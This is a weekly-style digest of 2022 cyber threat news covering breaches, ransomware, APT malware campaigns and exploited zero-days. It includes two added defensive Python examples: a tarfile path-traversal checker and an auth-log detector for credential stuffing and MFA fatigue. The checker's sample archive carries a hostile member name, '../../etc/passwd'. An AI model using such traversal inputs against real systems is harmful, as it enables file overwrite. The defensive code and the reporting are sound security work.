    The second-largest telecommunications provider in Australia – Optus – was recently breached and faced a $1m extortion threat. Making matters worse, the attacker started contacting Optus customers directly. According to reports in the Australian media, the hacker has texted customers demanding $2000 AUD to be paid within two days, or their personally identifiable information (PII) will be sold for fraudulent purposes. However, this is an ongoing story, and the hacker has now apparently taken down the database containing customers’ released information and apologized for their actions. It may be that the attacker got more attention than they bargained for.

    Hacker Breaches Fast Company Systems to Send Offensive Apple News Notifications

    Fast Company, a U.S. business publication, has confirmed that a hacker breached its internal systems to send offensive push notifications to Apple News users. In a statement, Fast Company said that a threat actor breached the company’s content management system (CMS) on Tuesday, giving them access to the publication’s Apple News account. The hacker used this access to send two “obscene and racist” push notifications to Apple News subscribers, prompting shocked users to post screenshots on Twitter. It’s not clear how many users received the notifications before they were deleted. “The messages are vile and are not in line with the content and ethos of Fast Company,” Fast Company said. “We are investigating the situation and have shut down FastCompany.com until the situation has been resolved.”

    North Korea-Linked Lazarus Continues to Target Job Seekers With MacOS Malware

    Last week we shared that SentinelOne researchers discovered decoy documents advertising positions for the popular cryptocurrency exchange Crypto[.]com, a continuation of an investigation by ESET back in August. The security company observed the APT group Lazarus targeting job seekers with macOS malware working on Intel and M1 chipsets. As you may recall, ESET published a series of tweets detailing the attacks; the experts spotted a signed Mac executable disguised as a job description for Coinbase. The malicious code was uploaded to VirusTotal from Brazil on August 11, 2022.

    Meta Takes Down Russian "Smash-and-Grab" Disinformation Campaign

    “Meta has revealed how it closed down two significant but unconnected disinformation operations originating in China and Russia, which attempted to influence public opinion in Western countries. The first was the ‘largest and most complex’ Russian campaign seen since the start of the country’s war against Ukraine, according to the social media giant” (Bleeping Computer, 2022). Meta notes that beginning in May, Russian actors coordinated a disinformation campaign against media consumers in Germany, France, Italy, Ukraine, and the UK. It centered on 60 websites designed to spoof legitimate news sites such as The Guardian in the UK and Germany’s Bild and Der Spiegel. The articles criticized Ukraine and Ukrainian refugees, supported Russia, and argued that Western sanctions on Russia would backfire.

    Leaked LockBit 3.0 builder used by ‘Bloody’ ransomware gang in attacks

    The relatively new Bloody Ransomware Gang has started to use a recently leaked LockBit ransomware builder in attacks against companies. Last week, the LockBit 3.0 ransomware builder was leaked on Twitter after the LockBit operator had a falling out with his developer. This builder allows anyone to build a fully functional encryptor and decryptor that threat actors can use for attacks. As the builder includes a configuration file that can easily be customized to use different ransom notes, statistics servers, and features, BleepingComputer predicted that other threat actors would soon use the builder to create their own ransomware.

    Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware

    A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT). "This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up. Sold on the dark web for €189 a month, Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware on the targeted machines, in this case Agent Tesla.

    Hackers Use PowerPoint Files for 'Mouseover' Malware Delivery

    Researchers from Cluster25 believe APT28, a Russian state-sponsored threat group, is using a new code execution technique that relies on mouse movement in Microsoft PowerPoint presentations (T1566.001, T1204.002), which in turn triggers a malicious PowerShell script (T1059.001). While most Microsoft Office-based attacks require malicious macros, this new technique does not, making it especially dangerous.

    Ransomware Data Theft Tool May Show a Shift in Extortion Tactics

    A new sample of malware known as Exmatter was spotted by malware analysts with the Cyderes Special Operations team during a recent incident response following a BlackCat ransomware attack and later shared with the Stairwell Threat Research team for further analysis (Symantec saw a similar sample deployed in a Noberus ransomware attack). Exmatter has been used by BlackMatter affiliates since at least October 2021, but this is the first time the malicious tool was seen sporting a destructive module.

    New Hacking Group ‘Metador’ Lurking in ISP Networks for Months

    Researchers have named a previously unknown threat actor 'Metador', which has been breaching telecommunications companies, internet service providers (ISPs), and universities for about two years. Metador targets organizations in the Middle East and Africa, and its purpose appears to be long-term persistence for espionage. The group uses two Windows-based malware families that have been described as "extremely complex," but there are indications of Linux malware, too.

    Microsoft SQL servers hacked in TargetCompany ransomware attacks

    Vulnerable Microsoft SQL servers are being targeted in a new wave of attacks with FARGO ransomware, security researchers are warning. MS-SQL servers are database management systems holding data for internet services and apps. Disrupting them can cause severe business trouble. BleepingComputer has reported similar attacks in February, dropping Cobalt Strike beacons, and in July when threat actors hijacked vulnerable MS-SQL servers to steal bandwidth for proxy services. The latest wave is more catastrophic, aiming for a quick and easy profit by blackmailing database owners.

    Sophos Firewall Zero-Day Exploited in Attacks on South Asian Organizations

    Last Friday, Sophos released security updates to address a critical zero-day vulnerability that is actively being exploited in the wild. Tracked as CVE-2022-3236 (CVSS score: 9.8), the flaw impacts Sophos Firewall v19.0 MR1 and older and is related to a code injection vulnerability in the User Portal and Webadmin of Sophos Firewall. Successful exploitation could enable a malicious threat actor to remotely execute code.

    Hackers Use NullMixer and SEO to Spread Malware More Efficiently

    Researchers from Kaspersky noticed a new malicious campaign using the NullMixer malware tool. The tool is used to spread malware via malicious websites and can easily be found via popular search engines, including Google. “These websites are often related to crack, keygen and activators for downloading software illegally, and while they may pretend to be legitimate software, they actually contain a malware dropper,” reads the advisory.

    Russia-Based Hackers FIN11 Impersonate Zoom to Conduct Phishing Campaigns

    Russian threat actors allegedly from FIN11 have been impersonating web download pages for Zoom to trick victims into downloading malicious executables. Security company Cyfirma released its findings and issued an advisory this week. FIN11 has been conducting a large-scale phishing campaign that masquerades as Zoom download pages. The goal of the campaign is to infect users with the Vidar information-stealing malware.

    Fake Indian Banking Rewards Apps Targeting Android Users with Info-stealing Malware

    An SMS-based phishing campaign is targeting customers of Indian banks with information-stealing malware that masquerades as a rewards application. The Microsoft 365 Defender Research Team said that the messages contain links that redirect users to a sketchy website that triggers the download of the fake banking rewards app for ICICI Bank. According to researchers, the malware is capable of intercepting important device notifications and stealing SMSes, allowing the threat actors to potentially swipe 2FA codes sent as text messages and gain unauthorized access to victim accounts.

    Hackers stealing GitHub accounts using fake CircleCI notifications

    GitHub is warning of an ongoing phishing campaign that started on September 16 and is targeting its users with emails that impersonate the CircleCI continuous integration and delivery platform. The bogus messages inform recipients that the user terms and privacy policy have changed and they need to sign into their GitHub account to accept the modifications and keep using the services. The threat actors' goal is to steal GitHub account credentials and two-factor authentication (2FA) codes by relaying them through reverse proxies.

    Australian Telecoms Company Optus Discloses Security Breach

    Optus, one of the largest service providers in Australia, disclosed a data breach. The intruders gained access to the personal information of both former and current customers. The company is a subsidiary of Singtel with 10.5 million subscribers as of 2019. The company notified the Australian Cyber Security Centre which is helping it to mitigate any risks to customers. Optus has also notified the Australian Federal Police, the Office of the Australian Information Commissioner and key regulators.

    CISA Warns of Critical ManageEngine RCE Bug Used in Attacks

    The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical severity Java deserialization vulnerability affecting multiple Zoho ManageEngine products to its catalog of bugs exploited in the wild. This security flaw (CVE-2022-35405) can be exploited in low-complexity attacks, without requiring user interaction, to gain remote code execution on servers running unpatched Zoho ManageEngine PAM360 and Password Manager Pro (without authentication) or Access Manager Plus (with authentication) software.

    LockBit Ransomware Builder Leaked Online by “Angry Developer”

    LockBit recently suffered a breach, with an allegedly disgruntled developer leaking the builder for the gang’s newest encryptor. In June, the LockBit ransomware operation released version 3.0 of their encryptor, codenamed LockBit Black, after testing it for two months. The new version promised to 'Make Ransomware Great Again,' adding new anti-analysis features, a ransomware bug bounty program, and new extortion methods.

    BlackCat Ransomware’s Data Exfiltration Tool Gets an Upgrade

    The BlackCat Ransomware gang (aka ALPHV) recently came out with a new version of its data exfiltration tool used for double-extortion attacks. Dubbed “Exmatter,” the tool was introduced during BlackCat’s launch in November 2021 and was heavily updated in August 2022, featuring the following changes:

    • Limit the types of files to exfiltrate to: PDF, DOC, DOCX, XLS, PNG, JPG, JPEG, TXT, BMP, RDP, SQL, MSG, PST, ZIP, RTF, IPT, and DWG.
    • Add FTP as an exfiltration option in addition to SFTP and WebDav.
    • Offer an option to build a report listing all processed files.
    • Add an “Eraser” feature giving the option to corrupt processed files.
    • Add a “Self-destruct” configuration option to quit and delete itself if executed in non-valid environments.
    • Remove support for Socks5.
    • Add an option for GPO deployment.

    The latest Exmatter version has undergone heavy code refactoring, allowing it to implement its existing features more stealthily to evade detection.

    Domain Shadowing Becoming More Popular Among Cybercriminals

    Researchers from Palo Alto’s Unit 42 have discovered that the technique of domain shadowing is more prevalent than originally thought. The company found nearly 12,000 cases of domain shadowing between April and June of 2022. “Domain shadowing is a subcategory of DNS hijacking, where threat actors compromise the DNS of a legitimate domain to host their own subdomains for use in malicious activity but do not modify the legitimate DNS entries that already exist.”

    Atlassian Confluence Bug CVE-2022-26134 Exploited in Cryptocurrency Mining Campaign

    In a post published by TrendMicro, threat actors were observed actively leveraging CVE-2022-26134, a remote code execution vulnerability, which received a critical rating of 9.8 out of 10 on the CVSS scale. TrendMicro also noted that if the bug is left unremedied and successfully exploited, it could be used for additional purposes, where an attacker could potentially take over domains, deploy information stealers, install remote access trojans (RATs), or deploy ransomware.

    Unpatched 15-Year-Old Python Bug Allows Code Execution in 350K Projects

    The vulnerability likely affects more than 350,000 open-source repositories and could lead to code execution if exploited by an attacker. CVE-2007-4559 was disclosed in 2007, but the security bug never received a patch. The only mitigation provided around the time of disclosure was a documentation update warning developers that the vulnerability exists. The bug lies in the Python tarfile package, "in code that uses un-sanitized tarfile.extract() function or the built-in defaults of tarfile.extractall()." A path traversal bug enables an attacker to overwrite arbitrary files.
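    As an added, defender-side illustration of the tarfile issue described above (example code written for this digest, not from the original report or from CPython): the archive is constructed in memory, and `unsafe_members`/`safe_extractall` are assumed helper names that vet every member's resolved path before anything is written. Recent Python releases also add a `filter=` argument to `extractall` for the same purpose; the explicit check below does not depend on it.

```python
import io
import os
import tarfile
import tempfile


def build_sample_archive(members=None) -> bytes:
    """Build an in-memory tar archive from (name, data) pairs.

    Constructed sample data, not a real-world sample: by default it holds one
    benign file plus one member whose name climbs out of the extraction
    directory with "../", which is the shape of the CVE-2007-4559 problem.
    """
    if members is None:
        members = [("docs/readme.txt", b"hello"), ("../../etc/passwd", b"pwned")]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members:
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def is_within_directory(directory: str, target: str) -> bool:
    """True if target, once normalised, stays inside directory."""
    abs_dir = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return os.path.commonpath([abs_dir, abs_target]) == abs_dir


def unsafe_members(tar: tarfile.TarFile, dest: str) -> list:
    """Names of members that would be written outside dest.

    Covers "../" traversal, absolute member names, and symlinks/hardlinks
    whose link target points outside dest (a link planted by one member can
    redirect a later member's write).
    """
    bad = []
    for member in tar.getmembers():
        target = os.path.join(dest, member.name)
        if not is_within_directory(dest, target):
            bad.append(member.name)
            continue
        if member.issym():
            # symlink targets resolve relative to the link's own directory
            link_target = os.path.join(os.path.dirname(target), member.linkname)
            if not is_within_directory(dest, link_target):
                bad.append(member.name)
        elif member.islnk():
            # hardlink targets are archive-relative names
            if not is_within_directory(dest, os.path.join(dest, member.linkname)):
                bad.append(member.name)
    return bad


def safe_extractall(tar: tarfile.TarFile, dest: str) -> list:
    """Extract only after vetting every member; refuse the whole archive if any is unsafe."""
    bad = unsafe_members(tar, dest)
    if bad:
        raise ValueError("refusing to extract, path traversal in: " + ", ".join(bad))
    tar.extractall(dest)
    return [m.name for m in tar.getmembers()]


def demo() -> dict:
    """Run the malicious and the benign case in a temporary directory and report the outcome."""
    result = {}
    with tempfile.TemporaryDirectory() as dest:
        with tarfile.open(fileobj=io.BytesIO(build_sample_archive()), mode="r") as tar:
            result["flagged"] = unsafe_members(tar, dest)
            try:
                safe_extractall(tar, dest)
                result["malicious_rejected"] = False
            except ValueError:
                result["malicious_rejected"] = True
        benign = build_sample_archive([("docs/readme.txt", b"hello")])
        with tarfile.open(fileobj=io.BytesIO(benign), mode="r") as tar:
            result["extracted"] = safe_extractall(tar, dest)
        with open(os.path.join(dest, "docs", "readme.txt"), "rb") as fh:
            result["content"] = fh.read()
    return result


if __name__ == "__main__":
    print(demo())
```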

    Imperva mitigated long-lasting, 25.3 billion request DDoS attack

    Internet security company Imperva has announced its DDoS (distributed denial of service) mitigation solution has broken a new record, defending against a single attack that sent over 25.3 billion requests to one of its customers. The target was a Chinese telecommunications service provider often at the receiving end of DDoS attacks with unusually large volumes. The DDoS attack unfolded on June 27, 2022, peaking at 3.9 million requests per second (RPS) and averaging 1.8 million RPS.

    Hive Ransomware Claims Attack on New York Racing Association

    NYRA is the operator of New York's most extensive thoroughbred horse racing tracks, namely the Aqueduct Racetrack, the Belmont Park, and the Saratoga Racecourse. According to the security breach notifications sent to impacted individuals late last month and shared with the authorities last week, the threat actors may have exfiltrated the following member information from the organization:

    • Social security numbers (SSNs)
    • Driver's license identification numbers
    • Health records
    • Health insurance information

    Okta: Credential Stuffing Accounts for 34% Of All Login Attempts

    Okta reports that attacks involving credential stuffing have gotten worse in 2022. The identity and access management firm has recorded over 10 billion credential stuffing events on its platform in the first 90 days of 2022. This number represents roughly 34% of the overall authentication traffic, which means that one-third of all attempts are malicious and fraudulent. Okta notes that recent attacks are using a “burst” approach, where a large number of credentials are used in a short time. Impacted platforms saw sudden load spikes of up to tenfold from previous attacks, targeting specific geographic locations, with the worst cases located in Southeast Asia and the United States.

    2K Games Says Hacked Help Desk Targeted Players with Malware

    American video game publisher 2K has confirmed that its help desk platform was hacked and used to target customers with fake support tickets pushing malware via embedded links. 2K released a statement on the incident: "Earlier today, we became aware that an unauthorized third party illegally accessed the credentials of one of our vendors to the help desk platform that 2K uses to provide support to our customers." Using the third-party support system, the threat actor sent communications to certain players which contained a malicious link. 2K is asking customers not to open emails coming from 2K Games support at this time. The malicious link delivered a ZIP archive which, if opened, contained the RedLine Stealer malware.

    IT Giants Warn of Ongoing ChromeLoader Malware Campaigns

    Back in May, researchers from Red Canary found a malicious Chrome browser extension (T1587.001) that modifies browser settings and redirects user traffic (T1185). “The malware is able to redirect the user’s traffic and hijack user search queries to popular search engines, including Google, Yahoo, and Bing. The malicious code is also able to use PowerShell (T1059.001) to inject itself into the browser and add the extension to the browser” (Security Affairs, 2022). This week, VMware and Microsoft confirmed their own sightings of a widespread ChromeLoader campaign that is dropping malicious browser extensions, node-WebKit malware, and ransomware.

    American Airlines Discloses Data Breach After Employee Email Compromise

    American Airlines has notified customers of a recent data breach after attackers compromised an undisclosed number of employee email accounts and gained access to sensitive personal information. In notification letters sent on Friday, September 16th, the airline explained that it has no evidence that the exposed data was misused. American Airlines discovered the breach on July 5th, immediately secured the impacted email accounts, and hired a cybersecurity forensic firm to investigate the security incident.

    Uber Blames Lapsus$ for Breach

    The threat actor responsible for hacking Uber last week is likely connected to the prolific Lapsus$ group, the firm has claimed. The ride-hailing giant admitted last Thursday that it was investigating a security incident after reports revealed a malicious actor claiming to be 18 years old had managed to access email and cloud systems, code repositories, an internal Slack account and HackerOne tickets. In an update yesterday, Uber explained that the attacker targeted an Uber EXT contractor, most likely obtaining their corporate password on the dark web after the credential had been stolen via malware installed on their personal device.

    MFA Fatigue: Hackers’ New Favorite Tactic in High-Profile Breaches

    Attackers are increasingly using social engineering to obtain corporate credentials and breach large networks. One component of these attacks that has grown with the adoption of multi-factor authentication is a technique called MFA Fatigue: holding a valid username and password, the attacker repeatedly triggers MFA push notifications to the victim's device until the user, worn down or assuming a glitch, approves one. When breaching corporate networks, hackers commonly use stolen employee login credentials to access VPNs and the internal network, and MFA fatigue is how they get past the second factor.
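    The credential stuffing bursts described in the Okta item and the MFA push bombing described here leave the same kind of trace in an identity provider's authentication log, so one detection example serves both passages. The Python below is an added illustration, not code from Okta, Uber or any report cited on this page; the line format, field names, thresholds and every log line are constructed for the example.

```python
"""Added example: two detectors over identity-provider style auth logs.
Not Okta's, Uber's or any vendor's code. The line format, field names,
thresholds and every log line below are constructed for this illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one event per line:
#   <ISO-8601 timestamp> <event> user=<name> src=<ip>
# event: login_fail | login_ok | mfa_push_sent | mfa_push_approved
# (a push the user ignores until it times out produces no event here)
SAMPLE_LOG = """\
2022-09-15T08:00:00 login_fail user=alice src=203.0.113.5
2022-09-15T08:00:03 login_fail user=bob src=203.0.113.5
2022-09-15T08:00:06 login_fail user=carol src=203.0.113.5
2022-09-15T08:00:09 login_fail user=dave src=203.0.113.5
2022-09-15T08:00:12 login_fail user=erin src=203.0.113.5
2022-09-15T08:00:15 login_fail user=frank src=203.0.113.5
2022-09-15T08:00:18 login_ok user=frank src=203.0.113.5
2022-09-15T08:05:00 login_fail user=alice src=198.51.100.7
2022-09-15T08:06:30 login_ok user=alice src=198.51.100.7
2022-09-15T09:00:00 mfa_push_sent user=carol src=192.0.2.20
2022-09-15T09:00:07 mfa_push_approved user=carol src=192.0.2.20
2022-09-15T22:10:00 mfa_push_sent user=bob src=203.0.113.9
2022-09-15T22:11:00 mfa_push_sent user=bob src=203.0.113.9
2022-09-15T22:12:00 mfa_push_sent user=bob src=203.0.113.9
2022-09-15T22:13:00 mfa_push_sent user=bob src=203.0.113.9
2022-09-15T22:14:00 mfa_push_sent user=bob src=203.0.113.9
2022-09-15T22:15:00 mfa_push_sent user=bob src=203.0.113.9
2022-09-15T22:15:40 mfa_push_approved user=bob src=203.0.113.9
"""


def parse_log(text):
    """Parse the constructed format into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event, user_kv, src_kv = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "event": event,
                       "user": user_kv.split("=", 1)[1], "src": src_kv.split("=", 1)[1]})
    return events


def _windows(evs, window):
    """Yield every trailing window of time-sorted events no wider than `window`."""
    evs = sorted(evs, key=lambda e: e["ts"])
    start = 0
    for end in range(len(evs)):
        while evs[end]["ts"] - evs[start]["ts"] > window:
            start += 1
        yield evs[start:end + 1]


def credential_stuffing_sources(events, window=timedelta(seconds=60), min_users=5):
    """Burst shape: one source IP failing logins for many *distinct* usernames
    inside a short window. Returns {src: max distinct users seen in a window}."""
    by_src = defaultdict(list)
    for e in events:
        if e["event"] == "login_fail":
            by_src[e["src"]].append(e)
    flagged = {}
    for src, evs in by_src.items():
        for span in _windows(evs, window):
            users = {e["user"] for e in span}
            if len(users) >= min_users:
                flagged[src] = max(flagged.get(src, 0), len(users))
    return flagged


def mfa_fatigue_users(events, window=timedelta(minutes=10), min_pushes=5):
    """MFA fatigue shape: many push prompts to one user in a short window.
    Returns {user: {"pushes": n, "approved": bool}}; approved=True is the
    case where the victim eventually tapped 'approve'."""
    by_user = defaultdict(list)
    for e in events:
        if e["event"].startswith("mfa_push"):
            by_user[e["user"]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        for span in _windows(evs, window):
            sent = sum(1 for e in span if e["event"] == "mfa_push_sent")
            if sent >= min_pushes:
                hit = flagged.setdefault(user, {"pushes": 0, "approved": False})
                hit["pushes"] = max(hit["pushes"], sent)
                hit["approved"] |= any(e["event"] == "mfa_push_approved" for e in span)
    return flagged


def successful_logins_from(events, sources):
    """Users who logged in successfully from a flagged source: the accounts to reset first."""
    return [e["user"] for e in events if e["event"] == "login_ok" and e["src"] in sources]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    stuffing = credential_stuffing_sources(evs)
    print("stuffing sources:", stuffing, "reset:", successful_logins_from(evs, set(stuffing)))
    print("MFA fatigue users:", mfa_fatigue_users(evs))
```

    Both detectors use the same sliding window; what differs is the key (source IP with distinct users for stuffing, single user with push count for fatigue). In the sample, 203.0.113.5 is flagged and its one successful login, frank, is the account to reset, while bob's six pushes ending in an approval are the MFA fatigue success case that warrants session revocation rather than just a password change.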

    Russian Sandworm Hackers Pose as Ukrainian Telcos to Drop Malware

    The Russian state-sponsored hacking group known as Sandworm has been masquerading as telecommunication providers to target Ukrainian entities with malware. Starting from August 2022, researchers at Recorded Future have observed a rise in Sandworm command and control (C2) infrastructure that uses dynamic DNS domains masquerading as Ukrainian telecommunication service providers. While Sandworm has refreshed its C2 infrastructure significantly, it did so gradually, so historical data from CERT-UA reports allowed Recorded Future to link current operations with solid confidence to the threat actor.

    Emotet Botnet Now Pushes Quantum and Blackcat Ransomware

    While monitoring the Emotet botnet's current activity, security researchers found that the Quantum and BlackCat ransomware gangs are now using the malware to deploy their payloads. This is an interesting development given that the Conti cybercrime syndicate was the one that previously used the botnet before shutting down in June. The Conti group was the one who orchestrated its comeback in November after an international law enforcement action took down Emotet's infrastructure at the beginning of 2021.

    Hackers Had Access to LastPass's Development Systems for Four Days

    LastPass recently published an updated notice regarding the security incident that targeted its development environment and resulted in the theft of some of LastPass’s source code and technical information. According to the password management company, the threat actor had access to LastPass’s systems for a period of four days, during which LastPass’s security team detected the activity and contained the incident. Although the threat actor was able to access the development environment, LastPass confirmed that no customer data or encrypted password vaults were accessed.

    New York Ambulance Service Discloses Data Breach After Ransomware Attack

    Empress EMS (Emergency Medical Services), a New York-based emergency response and ambulance service provider, has disclosed a data breach that exposed customer information. According to the notification, the company suffered a ransomware attack on July 14, 2022. An investigation into the incident revealed that the intruder had gained access to Empress EMS’ systems on May 26, 2022. About a month and a half later, on July 13, the hackers exfiltrated “a small subset of files,” a day before deploying the encryption.

    GTA 6 Source Code and Videos Leaked After Rockstar Games Hack

    Grand Theft Auto 6 gameplay videos and source code have been leaked after a hacker allegedly breached Rockstar Games' Slack server and Confluence wiki. Rockstar Games, publisher of the Grand Theft Auto series, one of the best-selling game franchises, is valued at over $5 billion as of 2022. The videos and source code were first leaked on GTAForums yesterday, where a threat actor named ‘teapotuberhacker’ shared a link to a RAR archive containing 90 stolen videos.

    NETGEAR Routers Impacted by FunJSQ Game Acceleration Module Flaw

    Researchers at security and compliance assessment firm Onekey warn of an arbitrary code execution flaw in FunJSQ, a third-party online game acceleration module developed by Xiamen Xunwang Network Technology, that affects multiple Netgear router models. The FunJSQ module ships in various NETGEAR routers and Orbi WiFi systems; the issues were discovered in May 2022 and are now fixed. Firmware analysis allowed the researchers to identify the flawed module in NETGEAR routers (R9000, R7800, RAX200, RAX120, R6230, R6260, RAX40) and some Orbi WiFi Systems (RBR20, RBS20, RBR50, RBS50).

    Notepad++ Plugins Allow Attackers to Infiltrate Systems, Achieve Persistence

    According to research from Cybereason, threat actors are abusing Notepad++ plugins to bypass security mechanisms and achieve persistence on a victim machine (T1203). Notepad++ is a popular open source code editor that formats text for various programming languages. The abused component is the Notepad++ plugin pack, a .NET package for Visual Studio that provides a basic template for building plugins. An advanced persistent threat (APT) group is leveraging this plugin mechanism for malicious purposes.

    Uber Hacked, Internal Systems Breached and Vulnerability Reports Stolen

    Uber suffered a cyberattack Thursday afternoon with a hacker gaining access to vulnerability reports and sharing screenshots of the company's internal systems, email dashboard, and Slack server. The screenshots shared by the hacker and seen by BleepingComputer show what appears to be full access to many critical Uber IT systems, including the company's security software and Windows domain.

    Hive Ransomware Claims Cyberattack on Bell Canada Subsidiary

    The Hive ransomware gang claimed responsibility for an attack that hit the systems of Bell Canada subsidiary Bell Technical Solutions (BTS). BTS is an independent subsidiary with more than 4,500 employees, specializing in installing Bell services for residential and small business customers across the Ontario and Québec provinces. While the Canadian telecommunications company didn't reveal when its network was breached or the attack happened, Hive claims in a new entry added to its data leak blog that it encrypted BTS' systems almost a month ago, on August 20, 2022.

    North Korean Hackers are using Trojanized Versions of the PuTTY SSH Client to Deploy Backdoors

    North Korean hackers are using trojanized versions of the PuTTY SSH client to deploy backdoors on targets' devices as part of a fake Amazon job assessment. A novel element in this campaign is the use of trojanized versions of the PuTTY and KiTTY SSH utilities to deploy a backdoor, in this case 'AIRDRY.V2'. The group's latest activities appear to be a continuation of the 'Operation Dream Job' campaign, which has been ongoing since June 2020, this time targeting media companies.

    US Sanctions Iranian Spooks for Albania Cyberattack

    The U.S. government sanctioned Iran's Ministry of Intelligence and Security and its minister for a July cyberattack that temporarily paralyzed Albania's online service portal for citizens. The designation by the Department of Treasury prohibits persons under U.S. jurisdiction from transacting with the ministry and its minister, Esmail Khatib. The action will have no material effect given long-standing and robust governmental prohibitions on doing business with Iran. The Treasury Department already sanctioned the ministry for support of terrorism and human rights abuses, but the designation of Khatib is new.

    Russian Hackers Use New Info Stealer Malware Against Ukrainian Orgs

    Russian hackers have been targeting Ukrainian entities with previously unseen info-stealing malware during a new espionage campaign that is still active. Security researchers at Cisco Talos attribute the campaign to Gamaredon, a Russian state-backed threat group with a long history of targeting mainly organizations in the Ukrainian government, critical infrastructure, defense, security, and law enforcement.

    Researchers Detail OriginLogger RAT — Successor to Agent Tesla Malware

    Palo Alto Networks Unit 42 has detailed the inner workings of a malware called OriginLogger, “which has been touted as a successor to the widely used information stealer and remote access trojan (RAT) known as Agent Tesla” (The Hacker News, 2022). Agent Tesla is a .NET based keylogger and remote access tool that allows threat actors to gain remote access to targeted systems and beacon sensitive information to an actor-controlled domain. The malware can be purchased by interested buyers on the dark web and is generally distributed as an attachment in malicious spam emails.

    U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks

    On Wednesday, the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks since at least October 2020. The individuals are employees and associates of Iran-based Najee Technology Hooshmand Fater LLC (Najee Technology) and Afkar System Yazd Company (Afkar System).

    Tesla Hack Could Allow Car Theft, Security Researchers Warn

    Security researchers unveiled another potential flaw in the technology Tesla uses to unlock its cars, one that could make them vulnerable to theft. Whether because of Tesla's cutting-edge reputation or because techies like driving electric vehicles, Tesla seems to invite probes from white hat hackers eager to publicize how thieves could drive one away. The newest example comes from internet of things security company IOActive, which describes an attack involving two people, a customized RFID emulator and a mark who carries a Tesla near-field communication key card for a Model Y.

    Twitter Former Head of Security Told the Senate of Severe Security Failings by the Company

    Peiter ‘Mudge’ Zatko, Twitter's former head of security, testified before Congress on Tuesday, asserting that the platform ignored his security concerns and was vulnerable to cyberattacks. Zatko filed a whistleblower complaint in July with Congress, the Justice Department, the Federal Trade Commission and the Securities and Exchange Commission, arguing that Twitter misled regulators and the public about its cybersecurity practices. He added that ‘any employee could take over the accounts of any senator in this room.’ While serving as head of security for the company, from late 2020 until January 2022, he repeatedly alerted management to severe vulnerabilities that could expose the platform to compromise. “I’m here today because Twitter leadership is misleading the public, lawmakers, regulators and even its own board of directors,” Zatko told the hearing.

    Microsoft Fixes Exploited Zero-Day in the Windows CLFS Driver (CVE-2022-37969)

    Security researchers have noted that attackers are exploiting CVE-2022-37969 in the wild. The CVE affects the Microsoft Windows Common Log File System (CLFS) driver. To exploit the driver vulnerability, an attacker must already have access to the targeted system and the ability to run code on it (for example, by exploiting another vulnerability or through social engineering) before the bug can be triggered; it is a local privilege escalation, not a remote entry point.

    Death of Queen Elizabeth II Exploited to Steal Microsoft Credentials

    Threat actors are exploiting the death of Queen Elizabeth II in phishing attacks that lure targets to sites which steal their Microsoft account credentials. In addition to Microsoft account details, the attackers also attempt to steal their victims' multi-factor authentication (MFA) codes to take over their accounts. As reported, “Messages purported to be from Microsoft and invited recipients to an 'artificial technology hub' in her honor.”

    Zero-day in WPGateway WordPress Plugin Actively Exploited in Attacks

    The Wordfence Threat Intelligence team warned yesterday that WordPress sites are being actively targeted with exploits for a zero-day vulnerability in the WPGateway premium plugin. WPGateway is a WordPress plugin that allows admins to simplify various tasks, including setting up and backing up sites and managing themes and plugins from a central dashboard.

    Microsoft September 2022 Patch Tuesday Fixes Zero-Day Used in Attacks, 63 Flaws

    As part of the September 2022 Patch Tuesday, Microsoft addressed 63 vulnerabilities, including a zero-day that is actively being exploited in the wild. Of the 63 flaws, there were 18 Elevation of Privilege vulnerabilities, 1 Security Feature Bypass vulnerability, 30 Remote Code Execution vulnerabilities, 7 Information Disclosure vulnerabilities, and 7 Denial of Service vulnerabilities. Five of the 63 flaws have been rated critical in severity, all of which allow remote code execution.

    Chinese Hackers Create Linux Version of the SideWalk Windows Malware

    State-backed Chinese hackers have developed a Linux variant for the SideWalk backdoor used against Windows systems belonging to targets in the academic sector. The malware is attributed with high confidence to the SparklingGoblin threat group, also tracked as Earth Baku, which is believed to be connected to the APT41 cyberespionage group.

    Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw

    Yesterday, Apple released security updates addressing multiple vulnerabilities in iOS, macOS, and iPadOS, including a new zero-day flaw that has been exploited in the wild. The zero-day, tracked as CVE-2022-32917, resides in the kernel and could allow a malicious application to execute arbitrary code with kernel privileges. Although technical details of CVE-2022-32917 have not been released, Apple stated in its advisory that the bug was resolved with improved bounds checks.

    Lorenz Ransomware Breaches Corporate Network via Phone Systems

    The Lorenz ransomware gang now uses a critical vulnerability in Mitel MiVoice VOIP appliances to breach enterprises, using their phone systems for initial access to their corporate networks. Arctic Wolf Labs security researchers spotted this new tactic after observing a significant overlap with Tactics, Techniques, and Procedures (TTPs) tied to ransomware attacks exploiting the CVE-2022-29499 bug for initial access, as Crowdstrike reported in June. While these incidents weren't linked to a specific ransomware gang, Arctic Wolf Labs was able to attribute similar malicious activity to the Lorenz gang with high confidence.

    The U.S. Army Prepares for a 40 Drone Swarm Attack

